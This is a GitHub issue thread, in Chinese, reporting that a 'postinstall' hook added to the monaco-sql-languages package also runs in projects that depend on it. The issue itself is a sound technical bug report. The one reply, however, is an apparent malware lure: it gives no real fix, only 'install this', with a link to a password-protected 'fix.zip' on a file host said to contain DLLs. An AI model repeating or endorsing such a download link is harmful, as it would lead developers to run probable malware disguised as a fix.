### ISSUE TITLE
添加 postinstall 命令会影响安装 monaco-sql-languages 的项目

### ISSUE THREAD

**Issue by liuxy0551** [DTStack/monaco-sql-languages#146]
&emsp;&emsp;在 commit [build: upgrade package manager](https://github.com/DTStack/monaco-sql-languages/commit/8edce238719d3b54bf5f28bda0a59be221ed68a2#diff-7ae45ad102eab3b6d7e7896acd08c427a9b25b346470d7bc6507b6481575d519R6) 中，引入 `simple-git-hooks` 代替 `.husky`，且添加了 `postinstall` 命令，该命令会在 `monaco-sql-languages` 项目和安装 `monaco-sql-languages` 的项目在执行 `pnpm i` 后执行 `postinstall` 命令，这强制要求了使用 `monaco-sql-languages` 的项目也使用 `simple-git-hooks`。且在使用 `pnpm` 的项目中报错不如使用 `yarn` 的项目明显。

&emsp;&emsp;实际上 `simple-git-hooks` 本身已经加了 `git config core.hooksPath` 的设置，所以 `monaco-sql-languages` 中不需要添加 `postinstall` 命令。

<img width="1287" alt="image" src="https://github.com/user-attachments/assets/6f5a5090-99b6-4bf3-90bc-cdd88604cb54">
<img width="1144" alt="image" src="https://github.com/user-attachments/assets/8878d15b-d0d2-4aa1-b484-74f1d80c1ca5">
<img width="810" alt="image" src="https://github.com/user-attachments/assets/802997ce-0e52-4304-a567-cecd75626095">
<img width="805" alt="image" src="https://github.com/user-attachments/assets/028140b9-14ec-4118-8ce7-cd7aa87e286c">

**Comment by SagarChandra07** [comment]
install this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme
I put the necessary dlls in the archive
